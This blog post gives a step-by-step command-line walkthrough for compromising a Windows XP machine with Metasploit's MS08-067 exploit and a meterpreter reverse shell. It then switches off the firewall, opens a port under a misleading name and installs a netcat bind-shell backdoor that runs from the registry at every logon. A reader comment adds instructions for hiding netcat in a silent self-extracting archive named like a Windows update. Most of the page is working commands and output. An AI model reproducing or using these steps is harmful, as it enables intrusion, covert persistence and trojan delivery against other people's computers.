Strona główna > BackDoor, FireWall > Creating a Netcat Backdoor on a Windows XP

Creating a Netcat Backdoor on a Windows XP

Creating a Netcat  Backdoor on a Windows XP 

Netcat is a versatile tool that can perform a multitude of TCP/IP functions. One very useful feature, particularly for a penetration tester, is the ability to shovel a shell from one system to another. In this section, we’ll use this feature to access a remote backdoor on a Windows XP (Firewall is ON ) system. A backdoor is a communication channel that will provide us with a remote command shell of a previously exploited system (victim), allowing us to access the system at a later time. In this section, I will demonstrate various ways to use and create a backdoor on a Windows XP (Firewall is ON )  victim host.

Run Metasploit Console :

       =[ metasploit v4.4.0-dev [core:4.4 api:1.0]
+ — –=[ 869 exploits – 480 auxiliary – 144 post
+ — –=[ 250 payloads – 27 encoders – 8 nops
       =[ svn r15401 updated today (2012.06.07)

Scan Target with nmap

msf > namp
[-] Unknown command: namp.
msf > nmap
[*] exec: nmap
Nmap scan report for
Host is up (0.00s latency).
Not shown: 998 filtered ports
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds    # OPEN !!!

Choose exploit for the target ( Windows XP EN SP2 )

Microsoft Server Service Relative Path Stack Corruption

This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to handle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. This is just the first version of this module, full support for NX bypass on 2003, along with other platforms, is still in development.

msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show targets
Exploit targets:

   Id  Name
   —  —-
   0   Automatic Targeting
   1   Windows 2000 Universal
   2   Windows XP SP0/SP1 Universal
   3   Windows XP SP2 English (AlwaysOn NX)
   4   Windows XP SP2 English (NX)
   5   Windows XP SP3 English (AlwaysOn NX)
   6   Windows XP SP3 English (NX)
   7   Windows 2003 SP0 Universal
   8   Windows 2003 SP1 English (NO NX)
   9   Windows 2003 SP1 English (NX)
   10  Windows 2003 SP1 Japanese (NO NX)
   11  Windows 2003 SP2 English (NO NX)
   12  Windows 2003 SP2 English (NX)
   13  Windows 2003 SP2 German (NO NX)
   14  Windows 2003 SP2 German (NX)

Choose payload for the target ( Windows XP EN SP2 )

msf  exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(ms08_067_netapi) > set RHOST
msf  exploit(ms08_067_netapi) > set LHOST

msf  exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   —-     —————  ——–  ———–
   RHOST  yes       The target address
   RPORT    445                         yes       Set the SMB service port    # This Port is Open !!!
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   —-      —————  ——–  ———–
   EXITFUNC  thread               yes       Exit technique: seh, thread, process, none
   LHOST    yes       The listen address
   LPORT     4444                       yes       The listen port

Exploit target:

   Id  Name
   —  —-
   0   Automatic Targeting

Exploit ( Windows XP EN SP2 )

msf  exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP – Service Pack 2 – lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability…
[*] Sending stage (752128 bytes) to
[*] Meterpreter session 2 opened ( -> at 2012-06-07 13:28:59 +0200


meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM   # SYSTEM !!!!!
meterpreter > shell
Process 240 created.
Channel 1 created.

Runing shell on Windows XP and  DISABLE Firewall:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>Netsh firewall set opmode disable         # Disable FireWall
Netsh firewall set opmode disable
Ok.                                                           # It's OK - FireWall is OFF

In the next step we return to meterpreter and upload netcat to Windows XP:

meterpreter > upload c:\\tools\\nc.exe c:\\windows\\system32\\   # Upload netcat from my local machine to windows xp
[*] uploading  : c:\tools\nc.exe -> c:\windows\system32\
[*] uploaded   : c:\tools\nc.exe -> c:\windows\system32\\nc.exe   # Upload status – Ok

meterpreter > shell
Process 976 created.
Channel 3 created.

Open new TCP Port – No.1234

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>netsh firewall show opmode          # show firewall stsus
netsh firewall show opmode

Domain profile configuration:
Operational mode                  = Enable
Exception mode                    = Enable

Standard profile configuration (current):
Operational mode                  = Disable               # firewall is OFF
Exception mode                    = Enable

Local Area Connection firewall configuration:
Operational mode                  = Enable

C:\WINDOWS\system32>Netsh firewall set opmode mode = enable exceptions = enable
profile = all
Netsh firewall set opmode mode = enable exceptions = enable profile = all
Ok. # Firewall is On and excepions enable

C:\WINDOWS\system32>netsh firewall add portopening TCP 1234 "Windows Firewall Reporting
netsh firewall add portopening TCP 1234 "Windows Firewall Reporting
Agent" enable all
Ok.     # Open TCP port 1234

C:\WINDOWS\system32>netsh firewall show portopening
netsh firewall show portopening

Port configuration for Standard profile:
Port   Protocol  Mode     Name
1234   TCP       Enable   Windows Firewall Reporting   # my new port
139    TCP       Enable   NetBIOS Session Service
445    TCP       Enable   SMB over TCP
137    UDP       Enable   NetBIOS Name Service
138    UDP       Enable   NetBIOS Datagram Service

Install Windows BackDoor Shell

C:\WINDOWS\system32>reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d "c:\windows\system32\nc.exe -d -l -p1234 -e cmd.exe"

C:\WINDOWS\system32>reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d "c:\windows\system32\nc.exe -d -l -p1234 -e cmd.exe"

The operation completed successfully  # It's OK!



Now the next time a user logs on to the system, the Netcat backdoor command is triggered and sends a command prompt to our attack system.

And …

wmic:root\cli>startup list full
Command=c:\windows\system32\nc.exe -d -l -p1234 -e cmd.exe  # not hiden
User=All Users

Working OR Not ?

from another machine, run…

c:\tools>nc -v 1234
CASH-F32CDFF50A [] 1234 (?) open

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\metasploit>

It’s working !!!


Kategorie:BackDoor, FireWall
  1. Czerwiec 10, 2012 o 12:42 pm

    FROM –

    Netcat Advanced: Backdoor Creation

    Disclaimer: I am not responsible for how this information is used. I do not condone illegal activity. It is simple. If it isn’t your pc don’t mess with it.

    In this tutorial I will go into further detail on creating a netcat backdoor. This backdoor is undetectable by most anti-virus.

    For this tutorial you will need:
    WinRar Archiver

    After WinRar is installed, right click on nc.exe. Scroll down and click on Add to archive…

    Rename nc.rar to whatever you want (windowsupdate.rar, patch.rar, abstraktisabadass.rar, etc…)

    Under Archiving options check the box create SFX archive you should see the archive name change from name.rar to name.exe.

    Click on the tab Advanced and on the right side click on SFX options

    Under Path to extract type


    Under Run after extraction type

    nc.exe -vv -d -L -p 8080 -e cmd.exe

    Under Run before extraction type

    %windir%\system32\cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v „iexplorer” /t REG_SZ /d „%homedrive%%homepath%\System32sys\nc.exe -vv -d -L -p 8080 -e cmd.exe” /f > nul

    Click on the tab Modes then check Hide all and Skip existing files (You may not have the option skip existing files depending on your version of WinRar. In this case don’t worry about it. Your backdoor just won’t be as cool as everyone elses. :D)

    Double check everything and click Ok, then click Ok again to create the backdoor. Your finished!

    To connect to the victims computer Use nc You should see the victims command prompt come up.

  1. No trackbacks yet.


Wprowadź swoje dane lub kliknij jedną z tych ikon, aby się zalogować:


Komentujesz korzystając z konta Wyloguj /  Zmień )

Zdjęcie na Google

Komentujesz korzystając z konta Google. Wyloguj /  Zmień )

Zdjęcie z Twittera

Komentujesz korzystając z konta Twitter. Wyloguj /  Zmień )

Zdjęcie na Facebooku

Komentujesz korzystając z konta Facebook. Wyloguj /  Zmień )

Połączenie z %s

%d blogerów lubi to: